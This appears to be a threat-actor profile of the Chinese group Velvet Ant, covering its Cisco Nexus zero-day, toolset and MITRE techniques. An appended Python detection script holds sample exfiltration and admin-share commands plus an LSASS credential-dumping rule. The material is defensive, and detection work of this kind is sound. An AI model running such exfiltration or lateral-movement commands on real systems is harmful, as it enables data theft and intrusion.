
Velvet Ant group – Threat Actor

January 25, 2025
Reading Time: 5 mins read
in Threat Actors

Velvet Ant group

Location

China

Date of initial activity

2024

Suspected Attribution 

State-Sponsored Threat Group

Government Affiliation

Yes

Motivation

Espionage

Associated Tools

Cobalt Strike 
Empire 
Mimikatz
RATs (Remote Access Trojans) 
Metasploit 
PowerShell Scripts 
Netcat 
Rclone 

Software

Windows

Overview

Velvet Ant is a Chinese state-backed threat actor known for sophisticated, highly targeted attacks, exploitation of zero-day vulnerabilities, and advanced tradecraft. Its operations focus on high-value targets, often critical infrastructure and sensitive government entities, and illustrate the broader trend of nation-state actors using advanced persistent threats (APTs) to pursue geopolitical objectives.

Velvet Ant gained notoriety through its exploitation of CVE-2024-20399, a critical vulnerability in Cisco Nexus switches disclosed in early 2024. Exploiting this zero-day gave the group a foothold from which to infiltrate and compromise network environments, gain unauthorized access to sensitive systems, and potentially exfiltrate crucial data.

The group’s modus operandi reflects a deep understanding of its targets’ network architectures and operational environments. Velvet Ant’s attacks are stealthy and precise, typically proceeding in layers: initial exploitation, lateral movement, and data exfiltration. This approach maximizes impact while minimizing the risk of detection, making the group a significant concern for security teams and organizations worldwide.

Common targets

Taiwan - Information

Attack vectors

Software Vulnerabilities

How they operate

At the core of Velvet Ant’s operations are tools such as Cobalt Strike and Empire, which form the backbone of their command and control (C2) infrastructure. Cobalt Strike, a popular penetration testing tool, is repurposed by the group to establish and maintain control over compromised systems; its beacons for persistent communication and payload delivery make it a versatile instrument for executing commands and facilitating lateral movement within a network. Similarly, Empire provides a robust post-exploitation framework that lets Velvet Ant execute commands, gather information, and maintain access through various C2 channels.

Credential theft is central to Velvet Ant’s strategy, with Mimikatz playing a crucial role. Mimikatz is used to extract sensitive credentials from memory, including plaintext passwords and Kerberos tickets, which allows the group to escalate privileges and move through the network more easily. The group also relies on PowerShell scripts for data collection, payload execution, and lateral movement, further extending its ability to control compromised systems and exfiltrate data from them.

Velvet Ant additionally uses custom Remote Access Trojans (RATs) and publicly available tools to establish persistent access. Tools like njRAT or DarkComet let the group remotely administer compromised machines, execute commands, and gather intelligence. For exfiltration, Velvet Ant uses Rclone, which transfers data to cloud storage services and thereby bypasses traditional data exfiltration defenses.

The group’s technical operations reflect a sophisticated understanding of both the tools at its disposal and the vulnerabilities it exploits. By combining advanced malware, credential dumping, and custom scripts, Velvet Ant shows a high degree of adaptability and efficiency. Its ability to operate stealthily and adjust its methods to overcome security controls underscores the ongoing challenge posed by advanced persistent threats. As Velvet Ant continues to refine its tactics, vigilance and robust security measures remain essential to defending against such threats.

MITRE Tactics and Techniques

Initial Access:
  • T1133 – External Remote Services: Exploitation of external services to gain initial access to a network.

Execution:
  • T1047 – Windows Management Instrumentation (WMI): Utilization of WMI for executing malicious commands or scripts.
  • T1059.008 – Command and Scripting Interpreter: Network Device CLI: Use of network device command-line interfaces to execute commands.
  • T1569.002 – System Services: Service Execution: Exploitation of system services for executing commands or payloads.

Persistence:
  • T1037.004 – Boot or Logon Initialization Scripts: RC Scripts: Use of boot or logon initialization scripts to maintain persistence.
  • T1133 – External Remote Services: Reuse of external remote services for ongoing access.
  • T1078.002 – Valid Accounts: Domain Accounts: Use of valid domain accounts for persistence.
  • T1078.003 – Valid Accounts: Local Accounts: Use of valid local accounts for maintaining access.

Privilege Escalation:
  • T1078.002 – Valid Accounts: Domain Accounts: Exploitation of domain accounts for elevated privileges.

Defense Evasion:
  • T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking: Manipulation of DLL search order to evade detection.
  • T1562.004 – Impair Defenses: Disable or Modify System Firewall: Alteration of firewall settings to bypass defenses.
  • T1055 – Process Injection: Injection of malicious code into legitimate processes to evade detection.
  • T1070.006 – Indicator Removal: Timestomp: Modification of file timestamps to obscure evidence of malicious activity.
  • T1036.005 – Masquerading: Match Legitimate Name or Location: Masking malicious files or processes as legitimate entities.

Credential Access:
  • T1003.001 – OS Credential Dumping: LSASS Memory: Extraction of credentials from LSASS memory.

Discovery:
  • T1087.002 – Account Discovery: Domain Account: Identification of domain accounts within the network.
  • T1083 – File and Directory Discovery: Enumeration of files and directories to gather information.
  • T1135 – Network Share Discovery: Discovery of network shares for accessing additional resources.
  • T1018 – Remote System Discovery: Identification of remote systems within the network.
  • T1082 – System Information Discovery: Collection of system information to aid in further attacks.
  • T1016 – System Network Configuration Discovery: Gathering information on network configuration.
  • T1040 – Network Sniffing: Capturing network traffic to gather data.

Lateral Movement:
  • T1021.002 – Remote Services: SMB/Windows Admin Shares: Use of SMB/Windows Admin Shares for lateral movement.
  • T1021.004 – Remote Services: SSH: Utilization of SSH for moving laterally within the network.
  • T1570 – Lateral Tool Transfer: Transfer of tools between systems for lateral movement.

Collection:
  • T1039 – Data from Network Shared Drive: Collection of data from network shared drives.

Command and Control:
  • T1572 – Protocol Tunneling: Use of tunneling techniques to disguise command and control traffic.
  • T1090.001 – Proxy: Internal Proxy: Use of internal proxies for routing command and control traffic.
  • T1132.001 – Data Encoding: Standard Encoding: Encoding of data to evade detection during exfiltration.
  • T1071.001 – Application Layer Protocol: Web Protocols: Utilization of web protocols for command and control communication.

Exfiltration:
  • T1048 – Exfiltration Over Alternative Protocol: Use of alternative protocols to exfiltrate data.
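As an added example (not part of the original profile and not any vendor's detection content), the Python sketch below turns three techniques from the tool description and the technique list above, Mimikatz-style LSASS memory access (T1003.001), Rclone exfiltration to cloud storage (T1048) and admin-share use for lateral movement (T1021.002), into simple detection rules and runs them over constructed Sysmon-style events. The field names follow Sysmon EventID 10 (process access) and EventID 1 (process create); the allow-list and all sample values are assumptions.

```python
"""Added example: toy detection rules for three Velvet Ant techniques listed
above (T1003.001, T1048, T1021.002) over constructed Sysmon-style events."""
import re

# PROCESS_VM_READ: the access bit that lets a caller read LSASS memory.
PROCESS_VM_READ = 0x0010
# Constructed allow-list of images expected to open LSASS on this host.
LSASS_READERS_OK = {r"c:\windows\system32\svchost.exe",
                    r"c:\program files\windows defender\msmpeng.exe"}
# rclone copy/sync/move <local> <remote>:<path>  (T1048 via cloud storage)
RCLONE_RE = re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s+\S+\s+\w+:", re.I)
# \\host\C$ , \\host\ADMIN$ , \\host\IPC$  (T1021.002 admin shares)
ADMIN_SHARE_RE = re.compile(r"\\\\[\w.\-]+\\(admin\$|c\$|ipc\$)", re.I)

# Constructed sample events: index 0 is benign, indexes 1-3 each trip one rule.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\mm.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "Image": r"C:\Tools\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\share\finance remote:backup -q"},
    {"EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\fileserver\C$ /user:corp\svc_backup"},
]

def check_event(ev):
    """Return the MITRE technique IDs this one event matches ([] if none)."""
    hits = []
    if ev.get("EventID") == 10 and ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        # Flag memory-read access to LSASS from anything not on the allow-list.
        if access & PROCESS_VM_READ and ev.get("SourceImage", "").lower() not in LSASS_READERS_OK:
            hits.append("T1003.001")
    elif ev.get("EventID") == 1:
        cmd = ev.get("CommandLine", "")
        if RCLONE_RE.search(cmd):
            hits.append("T1048")
        if ADMIN_SHARE_RE.search(cmd):
            hits.append("T1021.002")
    return hits

def scan(events):
    """Map event index -> matched technique IDs, skipping benign events."""
    findings = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings[i] = hits
    return findings
```

In production the allow-list would be built from baseline telemetry and the rules fed from a SIEM rather than an inline list, but the matching logic is the same.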
